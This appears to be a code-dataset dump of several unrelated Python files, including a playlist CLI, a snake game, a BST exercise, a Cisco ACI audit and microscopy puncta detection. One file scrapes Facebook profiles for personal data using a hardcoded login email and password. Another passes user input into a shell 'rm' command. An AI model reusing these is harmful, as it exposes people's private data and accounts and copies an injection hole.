system(f\"del {n}.json\")\r\n else:\r\n system(f\"rm {n}.json\")\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n chdir(\"../resources/playlists\")\r\n\r\n playlists = listdir(\".\")\r\n\r\n while(True):\r\n menu()\r\n\r\n choice = int(input(\"\\n[i]Input your choice: \"))\r\n\r\n if(choice == 1):\r\n playlists = listdir(\".\")\r\n printList(playlists)\r\n\r\n elif(choice == 2):\r\n n = str(input(\"[i]Input the playlist name (ex. shakira_songs): \"))\r\n createFile(n)\r\n\r\n elif(choice == 3):\r\n n = str(input(\"[i]Input the playlist name (ex. shakira_songs): \"))\r\n contents = {}\r\n\r\n with open(f\"{n}.json\", \"r\", encoding = \"utf-8\") as file:\r\n contents = loads(file.read())\r\n \r\n while(True):\r\n print(\"\\n\")\r\n print(\"1_ Change playlist name\")\r\n print(\"2_ Add song\")\r\n print(\"3_ Show songs\")\r\n print(\"4_ Remove song\")\r\n print(\"5_ Save changes\")\r\n\r\n choice2 = int(input(\"\\n[i]Input your choice: \"))\r\n\r\n if(choice2 == 1):\r\n nn = str(input(\"[i]Input the new name (ex. not_shakira:songs): \"))\r\n\r\n elif(choice2 == 2):\r\n songN = str(input(\"[i]Input the song name with file extension (ex. say_goodbye.mp3): \"))\r\n contents[len(contents)] = songN\r\n\r\n elif(choice2 == 3):\r\n s = 0\r\n for k in contents:\r\n print(str(s) + \"_ \" + contents[k])\r\n s += 1\r\n\r\n elif(choice2 == 4):\r\n songN = str(input(\"[i]Input the song name with file extension (ex. say_goodbye.mp3): \"))\r\n d = str(input(f\"[i]Are you sure you want to delete {songN} from {n}? (y/n): \"))\r\n\r\n if(d == 'y'): \r\n res = None\r\n for sub in contents:\r\n if contents[sub] == songN:\r\n res = sub\r\n \r\n if(res == None):\r\n print(\"[-]Song not found\")\r\n else:\r\n del contents[res]\r\n \r\n else:\r\n print(\"[-]Canceled\")\r\n\r\n elif(choice2 == 5):\r\n with open(f\"{n}.json\", \"w\", encoding = \"utf-8\") as file:\r\n file.write(dumps(contents))\r\n\r\n break\r\n\r\n else:\r\n print(\"[-]Invalid option\")\r\n\r\n elif(choice == 4):\r\n n = str(input(\"[i]Input the playlist name (ex. shakira_songs): \"))\r\n d = str(input(f\"[i]Are you sure you want to delete {n}? (y/n): \"))\r\n \r\n if(d == 'y'): deleteFile(n)\r\n else: print(\"[-]Canceled\")\r\n\r\n elif(choice == 5):\r\n break\r\n\r\n else:\r\n print(\"[-]Invalid choice\")\r\n\r\n print(\"\\n\")","repo_name":"BanNeophiliatic/web_player","sub_path":"scripts/playlist.py","file_name":"playlist.py","file_ext":"py","file_size_in_byte":3578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26203531223","text":"import pymongo as mongo\nfrom dataentry import DataEntry\n\n\nclass DataMan:\n def __init__(self, url, database_name, collection_name):\n self.url = url\n self.database_name = database_name\n self.collection_name = collection_name\n\n self.client = mongo.MongoClient(url)\n self.database = self.client[database_name]\n self.collection = self.database[collection_name]\n\n def read_all(self):\n for entry_dict in self.collection.find():\n yield DataEntry(**entry_dict)\n\n def write(self, entry):\n self.collection.insert_one(dict(entry))\n","repo_name":"kwshi/dsnsm","sub_path":"dsnsm/dataman.py","file_name":"dataman.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16245813057","text":"\"\"\"Two Sum in Binary Search Tree.\"\"\"\n\n\nclass Node:\n def __init__(self, data: int) -> None:\n self.data = data\n self.left = None\n self.right = None\n\n\nclass BSTIterator:\n def __init__(self, root: Node, is_reversed: bool) -> None:\n self.stack: list[Node] = []\n self.reverse: bool = is_reversed\n self.push_all(root)\n\n def push_all(self, node: Node) -> None:\n while node is not None:\n self.stack.append(node)\n if self.reverse:\n node = node.right\n else:\n node = node.left\n\n def has_next(self):\n return len(self.stack) != 0\n\n def next(self) -> int:\n if self.has_next():\n node: Node = self.stack.pop()\n if not self.reverse:\n self.push_all(node.right)\n else:\n self.push_all(node.left)\n return node.data\n return 0\n\n\ndef tow_sum(root: Node, key: int) -> bool:\n if root is None:\n return False\n left = BSTIterator(root=root, is_reversed=False)\n right = BSTIterator(root=root, is_reversed=True)\n i: int = left.next()\n j: int = right.next()\n while i < j:\n if i + j == key:\n return True\n elif (i + j) < key:\n i = left.next()\n else:\n j = right.next()\n\n return False\n\n\ndef insert_node(root: Node, data: int) -> Node:\n \"\"\"Iterative approach.\"\"\"\n if root is None:\n return Node(data)\n\n cur: Node = root\n while True:\n if cur.data <= data:\n # insert in the right\n if cur.right:\n cur = cur.right\n else:\n cur.right = Node(data)\n break\n else:\n # insert in the left subtree\n if cur.left:\n cur = cur.left\n else:\n cur.left = Node(data)\n break\n\n return root\n\n\ndef in_order(root: Node) -> None:\n if root is None:\n return\n in_order(root.left)\n print(root.data, end=\"->\")\n in_order(root.right)\n\n\ndef build_tree(elements: list[int]) -> Node:\n root = Node(elements[0])\n for i in range(1, len(elements)):\n insert_node(root=root, data=elements[i])\n\n return root\n\n\nif __name__ == \"__main__\":\n elements: list[int] = [8, 5, 1, 7, 10, 12]\n root: Node = build_tree(elements=elements)\n in_order(root)\n print(\"None\")\n key: int = 14\n print(tow_sum(root=root, key=key))\n","repo_name":"kamrul-pu/problem-solving","sub_path":"data_structure/tree/bst_two_sum.py","file_name":"bst_two_sum.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3580122911","text":"from googleSearch import getFbProfilesUrls, getNameAdnSurname\nimport requests\nimport time\nfrom selenium.webdriver import Chrome\nfrom selenium.webdriver.chrome.options import Options\nfrom bs4 import BeautifulSoup\nfrom Person import Person\n\n\ndef checkData(s1,s2):\n nasm=getNameAdnSurname(s1)\n if s2.find(nasm.get('name')) is not -1 and s2.find(nasm.get('surname')) is not -1:\n return True\n else:\n return False\n\n\nclass FaceBookSearcher:\n def __init__(self,name):\n self.people=[]\n self.links=getFbProfilesUrls(name)\n self.goal=name\n\n def ifInclude(self, url):\n for i in self.links:\n if i is url:\n return True\n return False\n\n def getNameFromFb(self):\n for j in self.links:\n raw_html=requests.get(j)\n cont=raw_html.content\n soup=BeautifulSoup(cont,'html.parser')\n body=soup.body\n elem=body.find_all('a', {'href': j })\n ifAdded=False\n for i in elem:\n person=Person()\n person.setName(i.text)\n person.facebook['url']=j\n self.people.append(person)\n ifAdded=True\n if ifAdded:\n raw_html = requests.get(j)\n cont = raw_html.content\n soup = BeautifulSoup(cont, 'html.parser')\n body = soup.body\n elem = body.find_all('ul', {'class': 'uiList profile-friends _4kg'})\n for o in elem:\n for k in o:\n el = k.find_all('div', {'class': 'profileFriendsText'})\n for f in el:\n za=f.find_all('a')\n for x in za:\n if checkData(self.goal, x.text):\n if self.ifInclude(x['href']) is False and x['href'].find('sk-sk') is -1 and \\\n x['href'].find('pl-pl') is -1:\n self.links.append(x['href'])\n self.links=list(set(self.links))\n\n\n\n def searchData(self):\n opts = Options()\n opts.add_argument('--headless')\n\n browser = Chrome('chromedriver.exe', chrome_options=opts)\n browser.get('https://facebook.com')\n form=browser.find_element_by_id('email')\n form.send_keys('vojtekk94@o2.pl')\n form=browser.find_element_by_id('pass')\n form.send_keys('kochampalictrawke')\n browser.find_element_by_id('loginbutton').click()\n for i in self.people:\n browser.get(i.facebook['url'])\n req=browser.page_source\n soup=BeautifulSoup(req,'html.parser')\n photo_url=''\n photo_desc=''\n elem=soup.find('a',{'class' : '_2nlw _2nlv'})\n i.name=elem.text\n elem=soup.find('img', {'class': '_11kf img'})\n if elem is not None:\n photo_url=elem['src']\n photo_desc=elem['alt']\n i.facebook['profile_photo']=(photo_url,photo_desc)\n elems=soup.find_all('img',{'class' : 'scaledImageFitWidth img'})\n i.facebook['photos_urls']=[]\n for e in elems:\n i.facebook['photos_urls'].append(e['src'])\n i.facebook['favourites']={}\n keys=soup.find_all('div',{'class' : 'labelContainer'})\n m=soup.find_all('div', {'class' : 'mediaPortrait'})\n browser.get('{}/{}'.format(i.facebook['url'], 'about'))\n cont=browser.page_source\n soup=BeautifulSoup(cont,'html.parser')\n infos=soup.find_all('div',{'class' : '_c24 _50f4'})\n i.facebook['data']=[]\n for el in infos:\n val=soup.find('a')\n i.facebook['data'].append(el.text)\n interests=soup.find_all('div' , {'class' : '_30f'})\n i.facebook['interests']={}\n for it in interests:\n t=it.find_all('span', { 'class' : '_3sz'})\n if t:\n for g in t:\n i.facebook['interests'][g.text]=[]\n p=it.find_all('a', {'class' : '_gx7'})\n for z in p:\n i.facebook['interests'][g.text]=z.text\n\n browser.close()\n\n\n\n","repo_name":"wpadala420/osintPeopleSearcher","sub_path":"FacebookParse.py","file_name":"FacebookParse.py","file_ext":"py","file_size_in_byte":4345,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"2510683823","text":"from abc import ABC, abstractmethod\nimport json\n\nCONFIG_FILE_NAME = \"config.json\"\n\n\nclass AbstractExtractParser(ABC):\n def __init__(self, file_name):\n # read config file\n json_file = open(CONFIG_FILE_NAME)\n self.configs = json.load(json_file)\n json_file.close()\n\n self.all_debits, self.all_credits = self.parse_file(file_name)\n self.residents_payment, self.weird_credits = self.discover_resident_payments()\n self.defined_bills, self.weird_debits = self.discover_defined_bills()\n\n super().__init__()\n\n @abstractmethod\n def parse_file(self, file_name):\n \"\"\"\n Parse file and generate debit and credit objects\n :param file_name: name of account extract file\n :return debits: all debits in account\n credits: all credits in account\n \"\"\"\n pass\n\n def discover_resident_payments(self):\n \"\"\"\n Discover known resident payments using config file\n :return: resident_payments: dictionary with residents and found payment\n weird_credits: dictionary with weird credits\n \"\"\"\n\n residents_payments = {}\n weird_credits = self.all_credits.copy()\n\n # iterate through credits keys and values\n for cDescription, cValue in self.all_credits.items():\n # iterate through residents\n for resident in self.configs[\"residents\"]:\n\n # parse who pays values\n pay_methods = resident[\"who_pays\"].split(',')\n for pay_method in pay_methods:\n # if any pay_method in cDescription\n if pay_method in cDescription:\n parsed_payment = cValue#float(str(cValue).strip().\n # replace(\".\", \"\").\n # replace(\",\", \".\"))\n # allow residents two perform two payments in a month\n if resident[\"name\"] in residents_payments:\n residents_payments[resident[\"name\"]] += parsed_payment\n else:\n residents_payments[resident[\"name\"]] = parsed_payment\n\n # save credit to remove later\n weird_credits.pop(cDescription)\n\n return residents_payments, weird_credits\n\n def discover_defined_bills(self):\n \"\"\"\n Discover known bills using config file\n :return: defined_bills: dictionary with defined bills\n weird_debits: dictionary with weird debits\n \"\"\"\n\n defined_debits = {}\n weird_debits = self.all_debits.copy()\n\n # iterate through debits keys and values\n for dDescription, dValue in self.all_debits.items():\n # iterate through registered bills\n for bill in self.configs[\"house_bills\"]:\n # parse bill names\n bill_names = bill[\"extr_name\"].split(',')\n for bill_name in bill_names:\n # if any bill_name in dDescription\n if bill_name in dDescription:\n parsed_bill = dValue#float(str(dValue).strip().\n # replace(\".\", \"\").\n # replace(\",\", \".\"))\n # allow more than one bill type\n if bill[\"name\"] in defined_debits:\n defined_debits[bill[\"name\"]] += -parsed_bill\n else:\n defined_debits[bill[\"name\"]] = -parsed_bill\n\n # save debit to remove later\n weird_debits.pop(dDescription)\n\n return defined_debits, weird_debits\n","repo_name":"marcosscarpim/rep_bills_calculator","sub_path":"AbstractExtractParser.py","file_name":"AbstractExtractParser.py","file_ext":"py","file_size_in_byte":3790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29154412902","text":"#this is the first prototype for snake game environment to configure manual control in the game\r\nimport random\r\nimport pygame\r\nimport time\r\n\r\n\r\nwhite = (255,255,255)\r\nblack = (0,0,0)\r\nred = (255,0,0)\r\n\r\nblock_size = 20\r\nfps = 15\r\ndisplay_width = 800\r\ndisplay_height = 600\r\n\r\nclock = pygame.time.Clock()\r\n\r\npygame.init()\r\n\r\nfont = pygame.font.SysFont(\"Helvatica\",25)\r\n\r\n\r\n\r\n\r\ngameDisplay = pygame.display.set_mode((display_width,display_height))\r\npygame.display.set_caption(\"snake game environment 1\")\r\n\r\n\r\n#pygame.display.update()\r\ndef score(snake_length):\r\n score_text = str(snake_length-1)\r\n screen_text = font.render(score_text,True,black)\r\n gameDisplay.blit(screen_text,[1,1])\r\ndef snake(snake_list):\r\n for XnY in snake_list:\r\n pygame.draw.rect(gameDisplay,black,[XnY[0],XnY[1],block_size,block_size])\r\n\r\n\r\ndef messege_to_screen(msg,color):\r\n text_to_screen = font.render(msg,True,color)\r\n gameDisplay.blit(text_to_screen,[display_width/2,display_height/2])\r\n\r\n\r\ndef GameLoop():\r\n gameExit = False\r\n lead_x = display_width/2\r\n lead_y = display_height/2\r\n lead_x_change = 0\r\n lead_y_change = 0\r\n snake_list = []\r\n snake_length = 1\r\n randAppleX = round(random.randrange(0,display_width-block_size) / block_size)*block_size\r\n randAppleY = round(random.randrange(0,display_height-block_size) / block_size)*block_size\r\n gameOver = False\r\n\r\n while not gameExit:\r\n\r\n while gameOver:\r\n messege_to_screen(\"you loose press p to play again or q to quit\",red)\r\n pygame.display.update()\r\n for event in pygame.event.get():\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_p:\r\n GameLoop()\r\n elif event.key == pygame.K_q:\r\n gameOver = False\r\n gameExit = True\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n gameExit = True\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT and lead_x_change == 0:\r\n lead_x_change = -block_size\r\n lead_y_change = 0\r\n elif event.key == pygame.K_RIGHT and lead_x_change == 0:\r\n lead_x_change = block_size\r\n lead_y_change = 0\r\n elif event.key == pygame.K_UP and lead_y_change == 0:\r\n lead_y_change = -block_size\r\n lead_x_change = 0\r\n elif event.key == pygame.K_DOWN and lead_y_change == 0:\r\n lead_y_change = block_size\r\n lead_x_change = 0\r\n #print(event.type)\r\n lead_x += lead_x_change\r\n lead_y += lead_y_change\r\n if lead_x >= display_width or lead_y >= display_height or lead_x < 0 or lead_y <0:\r\n gameOver = True\r\n gameDisplay.fill(white)\r\n score(snake_length)\r\n snake_list.append([lead_x,lead_y])\r\n if len(snake_list) > snake_length:\r\n del snake_list[0]\r\n snake(snake_list)\r\n for XnY in snake_list[:-1]:\r\n if XnY == snake_list[snake_length-1]:\r\n gameOver = True\r\n break\r\n pygame.draw.rect(gameDisplay,red,[randAppleX,randAppleY,block_size,block_size])\r\n #gameDisplay.fill(red,rect = [200,200,20,20])\r\n pygame.display.update()\r\n if lead_x == randAppleX and lead_y == randAppleY:\r\n snake_length += 1\r\n randAppleX = round(random.randrange(0,display_width-block_size) / block_size)*block_size\r\n randAppleY = round(random.randrange(0,display_height-block_size) / block_size)*block_size\r\n\r\n clock.tick(fps)\r\n\r\n pygame.quit()\r\nGameLoop()\r\nquit()\r\n","repo_name":"subhamroy007/snakeAI","sub_path":"env_prototype1.py","file_name":"env_prototype1.py","file_ext":"py","file_size_in_byte":3797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41704591851","text":"from openerp import tools\nfrom openerp.osv import fields,osv\nimport openerp.addons.decimal_precision as dp\nimport time\nimport logging\nfrom openerp.tools.translate import _\n\n_logger = logging.getLogger(__name__)\n\nclass sale_move_analysis(osv.osv):\n\t_name \t\t= \"vit.move.analysis\"\n\t_columns \t= {\n\t\t'categ_id' \t\t\t: fields.many2one('product.category', 'Category'),\n\t\t'model_id' \t\t\t: fields.many2one('vit.master.type', 'Model'),\n\t\t'product_id'\t\t: fields.many2one('product.product', 'Product'),\n\t\t'onhand_qty' \t: fields.integer('OnHand Qty'),\n\t\t'in_qty'\t\t\t: fields.integer('Total In Qty'),\n\t\t'out_qty' \t\t\t: fields.integer('Total Out Qty'),\n\t\t'soh_qty' \t\t\t: fields.integer('Total SOH Qty'),\n\t\t'out_qty_cust' \t\t: fields.integer('Out Qty Customer'),\n\t\t'in_qty_qc' \t\t: fields.integer('In Qty QC'),\n\t\t'year'\t\t\t\t: fields.char('Year'),\n\t\t'month'\t\t\t\t: fields.char('Month'),\n\t\t'day'\t\t\t\t: fields.char('Day'),\n\t\t'location_id' \t\t: fields.many2one('stock.location','Location'),\n\t}\n\n\nclass sale_move_analysis_onhand(osv.osv):\n\t_name \t\t= \"vit.move.analysis.onhand\"\n\t_columns \t= {\n\t\t'categ_id' \t\t\t: fields.many2one('product.category', 'Category'),\n\t\t'model_id' \t\t\t: fields.many2one('vit.master.type', 'Model'),\n\t\t'product_id'\t\t: fields.many2one('product.product', 'Product'),\n\t\t'onhand_qty' \t: fields.integer('OnHand Qty'),\n\t\t'date' \t\t\t\t: fields.char(\"Date\"),\n\t\t'location_id' \t\t: fields.many2one('stock.location','Location'),\n\t}\t\t\t\t\t","repo_name":"akhdaniel/addons","sub_path":"mutif_all_vit_addons/vit_move_analysis/vit_move_analysis.py","file_name":"vit_move_analysis.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"34898006841","text":"\"\"\"\r\n MimDB project.\r\n Class for working with lists.\r\n\"\"\"\r\n\r\n# Imports\r\nfrom .data import database as d\r\nfrom .data_control import DataControl\r\n# End\r\n\r\nclass Lists:\r\n dataControl = DataControl()\r\n def __init__(self):\r\n self.dataControl = DataControl()\r\n\r\n def madd(self, key: str, values: list, column: int=0):\r\n '''\r\n Add values to a key.\r\n\r\n value must be a str list\r\n '''\r\n try:\r\n for i in values:\r\n d[key][column].append(i)\r\n Lists.dataControl.changes(d)\r\n\r\n return True\r\n\r\n except KeyError as e:\r\n try:\r\n if str(e) == '\\'' + key +'\\'':\r\n d[key] = [[]]\r\n for value in values:\r\n d[key][0].append(value)\r\n\r\n Lists.dataControl.changes(d)\r\n\r\n return True\r\n\r\n except IndexError:\r\n return False\r\n\r\n except Exception as e:\r\n if str(e) == 'list index out of range':\r\n print(e)\r\n return False\r\n\r\n else:\r\n self.dataControl.log(e)\r\n return e\r\n\r\n def madd_column(self, key: str, count_columns: int):\r\n\r\n try:\r\n for i in range(count_columns):\r\n d[key].append([])\r\n\r\n Lists.dataControl.changes(d)\r\n\r\n return len(d[key])\r\n\r\n except KeyError as e:\r\n if str(e) == '\\'' + key +'\\'':\r\n d[key] = []\r\n for i in range(count_columns):\r\n d[key].append([])\r\n \r\n Lists.dataControl.changes(d)\r\n \r\n return len(d[key])\r\n\r\n \r\n except Exception as e:\r\n self.dataControl.log(e)\r\n return e\r\n\r\n def mmembers(self, key: str, column: int=0):\r\n '''Get members of a list'''\r\n try:\r\n return d.get(key, None)[column] if d.get(key, None) != None else None\r\n\r\n except Exception as e:\r\n self.dataControl.log(e)\r\n return e\r\n\r\n def mrem(self, key: str, values: list):\r\n '''Remove one or some values from a key'''\r\n try:\r\n removable = None\r\n count = 0\r\n number = 0\r\n for column in d[key]:\r\n for value in column:\r\n if value in values:\r\n removable = value\r\n count += 1\r\n \r\n for i in range(int(count)):\r\n d[key][number].remove(removable)\r\n\r\n number += 1\r\n \r\n Lists.dataControl.changes(d)\r\n\r\n return True\r\n\r\n except KeyError as e:\r\n return False\r\n\r\n except Exception as e:\r\n self.dataControl.log(e)\r\n return e\r\n\r\n def mclear(self, key: str):\r\n '''Clear all contents of a key'''\r\n try:\r\n d[key].clear()\r\n Lists.dataControl.changes(d)\r\n\r\n return True\r\n\r\n except KeyError as e:\r\n return False\r\n\r\n except Exception as e:\r\n self.dataControl.log(e)\r\n return e\r\n\r\n def mdel(self, key: str):\r\n '''Delete a key from databse'''\r\n try:\r\n del d[key]\r\n Lists.dataControl.changes(d)\r\n\r\n return True\r\n\r\n except KeyError as e:\r\n return False\r\n\r\n except Exception as e:\r\n self.dataControl.log(e)\r\n return e","repo_name":"MostafaMim04/MimDB-Beta","sub_path":"mimdb-beta/src/lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"26953234317","text":"### Pulls ACI data together to create Tables for output\n### Data processing?\nimport write.writexlsx.write2excel as w2x\nfrom pprint import pprint\n\n#region Build Portmap (Ethernet and Logical)\nbadFill = 'FFC7CE'\nbadFont = '9C0006'\ngoodFill = 'C6EFCE'\ngoodFont = '006100'\nneutralFill = 'FFEB9C'\nneutralFont = '9C5700'\nnormalFill = 'FFFFFF'\nnormalFont = '000000'\n\nportTests = [{'data': 'connected', 'fill': goodFill, 'font': goodFont},\n {'data': 'notconnect', 'fill': neutralFill, 'font': neutralFont},\n {'data': 'suspnd', 'fill': badFill, 'font': badFont},\n {'data': 'noOperMem', 'fill': badFill, 'font': badFont},\n {'data': 'down', 'fill': badFill, 'font': badFont},\n {'data': 'errDisable', 'fill': badFill, 'font': badFont},]\nportstatus = [{'key': 'state', 'test': portTests}]\n#endregion\n\n\ndef hwlist(filename, device_list): ### Build hw list and create excel doc\n wb = w2x.build_workbook(filename, TAB='HW List')\n aciTable = w2x.buildtable(device_list, 'ACI Fabric')\n aciTable.setworksheet(wb.active)\n aciTable.writetable()\n return wb\n\ndef aciTable(ws, obj, attr, hl):\n table = ''\n try:\n newobj = getattr(obj, attr)\n table = w2x.buildtable(newobj, hl)\n table.setworksheet(ws)\n except:\n print(f'Failed to build table ({hl}) in Tenant {a.name}')\n return table\n\ndef orderTable(priorTable, Table):\n try:\n row = priorTable.row + len(priorTable.rowobject)\n Table.row = row\n except:\n print('Failed for Order Table')\n\n\n\ndef tenantTabs(wb, tenantList):\n for a in tenantList:\n newtab = w2x.addTab(wb, a.name)\n # Build Tables for Tenant Tab\n bdTable = aciTable(newtab, a, 'bd', 'Bridge Domains')\n epgTable = aciTable(newtab, a, 'epg', 'End-point Groups')\n contractTable = aciTable(newtab, a, 'contract', 'Contracts')\n\n # Order Tables\n epgTable.orderTable(bdTable)\n contractTable.orderTable(epgTable)\n\n # Write Tables\n bdTable.writetable()\n epgTable.writetable()\n contractTable.writetable()\n\ndef aciBuildExcel(filename, fabricObj):\n newHW = []\n pprint('Building Excel')\n pprint(vars(fabricObj))\n for a in fabricObj.hwlist:\n newHW = newHW + a\n WB = hwlist(filename, newHW)\n # tenantTabs(WB, fabricObj.tenants)\n\n\n WB.save(filename)\n","repo_name":"smswanson/NetworkAudit","sub_path":"cisco/aci/audit/aciAudit.py","file_name":"aciAudit.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9068753179","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 8 12:22:20 2021\n\n@author: surbhitwagle\n\"\"\"\n\nimport numpy as np\nimport os\nfrom math import sqrt\nimport matplotlib.pyplot as plt\nfrom skimage.feature import blob_dog, blob_log, blob_doh\n\nfrom skimage.draw import polygon, disk\n\nfrom .PathFinding import GetAllpointsonPath\nimport json\nimport csv\n\nclass Puncta:\n\n def __init__(self,location,radius,stats,between_cp,distance,struct,channel,snapshot):\n self.location = location\n self.radius = radius\n self.max = stats[0]\n self.min = stats[1]\n self.mean = stats[2]\n self.std = stats[3]\n self.median = stats[4]\n self.between = between_cp\n self.distance = distance\n self.struct = struct\n self.channel = channel\n self.snapshot = snapshot\n\nclass PunctaDetection:\n \"\"\"\n class that holds meta data for puncta detection and methods for puncta stats calculations\n \"\"\"\n\n def __init__(self, SimVars, tiff_Arr, somas, dendrites, dend_thresh=0.75,soma_thresh=0.5):\n self.Dir = SimVars.Dir\n self.tiff_Arr = tiff_Arr\n self.somas = somas \n self.dendrites = dendrites \n self.channels = SimVars.Channels\n self.snaps = SimVars.Snapshots\n self.scale = SimVars.Unit \n self.dend_thresh = dend_thresh\n self.soma_thresh = soma_thresh\n self.SimVars = SimVars\n\n def isBetween(self, a, b, c):\n \"\"\"\n function that checks if c lies on perpendicular space between line segment a to b\n input: roi consecutive points a,b and puncta center c\n output: True/False\n \"\"\"\n sides = np.zeros(3)\n sides[0] = (a[0] - b[0]) ** 2 + (a[1] - b[1]) ** 2 # ab\n original = sides[0]\n sides[1] = (b[0] - c[0]) ** 2 + (b[1] - c[1]) ** 2 # bc\n sides[2] = (c[0] - a[0]) ** 2 + (c[1] - a[1]) ** 2 # ca\n sides = np.sort(sides)\n if sides[2] > (sides[1] + sides[0]) and sides[2] != original:\n return False\n\n return True\n\n def Perpendicular_Distance_and_POI(self, a, b, c):\n \"\"\"\n distance between two parallel lines, one passing (line1, A1 x + B1 y + C1 = 0) from a and b\n and second one (line 2, A1 x + B1 y + C2 = 0) parallel to line1 passing from c is given\n |C1-C2|/sqrt(A1^2 + B1^2)\n\n input: roi consecutive points a,b and puncta center c\n output: Perpendicular from line segment a to b and point of intersection at the segment\n \"\"\"\n m = (a[1] - b[1]) / (a[0] - b[0] + 1e-18)\n if m == 0:\n m = 1e-9\n c1 = a[1] - m * a[0]\n c2 = c[1] - m * c[0]\n dist = np.absolute(c1 - c2) / np.sqrt(1 + m**2)\n m_per = -1 / m\n c3 = c[1] - m_per * c[0]\n x_int = (c3 - c1) / (m - m_per) * 1.0\n y_int = (m_per * x_int + c3) * 1.0\n\n ax_int = np.sqrt((a[0] - x_int) ** 2 + (a[1] - y_int))\n bx_int = np.sqrt((b[0] - x_int) ** 2 + (b[1] - y_int))\n ab = np.sqrt((a[0] - b[0]) ** 2 + (a[1] - b[1]) ** 2)\n return x_int, y_int, dist\n\n def GetClosestRoiPoint(self, dendrite, point):\n \"\"\"\n function that finds closest roi point if point is not on dendrite\n input: dendrite rois,point\n output: distance from the origin of the dendrite\n \"\"\"\n min_dist = 10**18\n prev = [dendrite[0][0], dendrite[1][0]]\n dist_from_origin = 0\n closest_p = [0, 0]\n closed_p_idx = 0\n for idx, x in enumerate(dendrite[0][:]):\n y = dendrite[1][idx]\n a = [x, y]\n dist = np.sqrt((point[1] - a[1]) ** 2 + (point[0] - a[0]) ** 2)\n if dist < min_dist:\n min_dist = dist\n dist_from_origin += np.sqrt(\n (prev[1] - a[1]) ** 2 + (prev[0] - a[0]) ** 2\n )\n closest_p = a\n closed_p_idx = idx\n prev = a\n return dist_from_origin\n\n def Is_On_Dendrite(self, dendrite, point, max_dist):\n \"\"\"\n function that checks on which segment of the dendrite the point is present (if)\n input: dendrite,point,max_dist\n output: True/False and scaled distance from the origin of the dendrite\n \"\"\"\n length_from_origin = 0\n prev_distance = 10**20\n for idx, x in enumerate(dendrite[0][:-1]):\n y = dendrite[1][idx]\n a = [x, y]\n b = [dendrite[0][idx + 1], dendrite[1][idx + 1]]\n if self.isBetween(a, b, point):\n x_int, y_int, distance = self.Perpendicular_Distance_and_POI(\n a, b, point\n )\n if distance <= max_dist:\n length_from_origin += np.sqrt(\n (y_int - a[1]) ** 2 + (x_int - a[0]) ** 2\n )\n return True, length_from_origin * self.scale\n length_from_origin += np.sqrt((b[1] - a[1]) ** 2 + (b[0] - a[0]) ** 2)\n\n length_from_origin = self.GetClosestRoiPoint(dendrite, point)\n return False, length_from_origin * self.scale\n\n # set somatic = False for dendritic punctas\n def GetPunctaStats(self, x, y, r, original_img):\n \"\"\"\n function that claculates the stats of gaussian puncta centered at x,y with radius r\n input: x,y, r and original image called by PunctaDetection class object\n output: list that includes the max, min,mean,std and median of the pixels in circle at x,y with radius r\n \"\"\"\n #\n img = np.zeros(original_img.shape, dtype=np.uint8)\n rr, cc = disk((y, x), r, shape=original_img.shape)\n img[rr, cc] = 1\n f_img = np.multiply(original_img, img)\n f_img_data = original_img[np.nonzero(f_img)]\n puncta_stats = [\n f_img_data.max(),\n f_img_data.min(),\n f_img_data.mean(),\n f_img_data.std(),\n np.median(f_img_data),\n ]\n return puncta_stats\n\n def GetPunctas(self,Soma=True):\n \"\"\"\n function that does the puncta detection\n input: none, called by PunctaDetection class object\n output: two dictionaries that stores list of puncta stats for each puncta element wise (soma/dendrite)\n \"\"\"\n NoDendrite = False\n all_c_t_somatic_puncta = []\n all_c_t_dendritic_puncta = []\n for t in range(self.snaps):\n all_c_somatic_puncta = []\n all_c_dendritic_puncta = []\n for ch in range(self.channels):\n\n orig_img = self.tiff_Arr[t, ch, :, :].astype(float)\n if(Soma):\n somatic_puncta,anti_soma = self.GetPunctasSoma(orig_img,ch,t)\n all_c_somatic_puncta.append(somatic_puncta)\n else:\n anti_soma = np.ones(np.shape(orig_img), \"uint8\")\n try:\n dendritic_puncta = self.GetPunctasDend(orig_img,anti_soma,ch,t)\n except:\n NoDendrite = True\n dendritic_puncta = []\n\n all_c_dendritic_puncta.append(dendritic_puncta)\n all_c_t_somatic_puncta.append(all_c_somatic_puncta)\n all_c_t_dendritic_puncta.append(all_c_dendritic_puncta)\n if(not NoDendrite):\n self.SimVars.frame.set_status_message.setText(\"Punctas are available on all snaphshots/channels\")\n else:\n self.SimVars.frame.set_status_message.setText(\"Punctas are available on all snaphshots/channels, but there was no dendrite, so no dendritic puncta\")\n return all_c_t_somatic_puncta, all_c_t_dendritic_puncta\n\n def GetPunctasSoma(self,orig_img,ch,t_snape):\n \"\"\"Detects and returns somatic puncta in the given image.\n\n Performs puncta detection on the soma regions of the image and returns the detected puncta.\n\n Args:\n orig_img: The original image in which puncta are to be detected.\n\n Returns:\n somatic_puncta: A list of Puncta objects representing the detected somatic puncta.\n anti_soma: An anti-soma image obtained by subtracting soma regions from the original image.\n \"\"\"\n somatic_puncta = []\n\n soma_img = np.zeros(np.shape(orig_img), \"uint8\")\n anti_soma = np.ones(np.shape(orig_img), 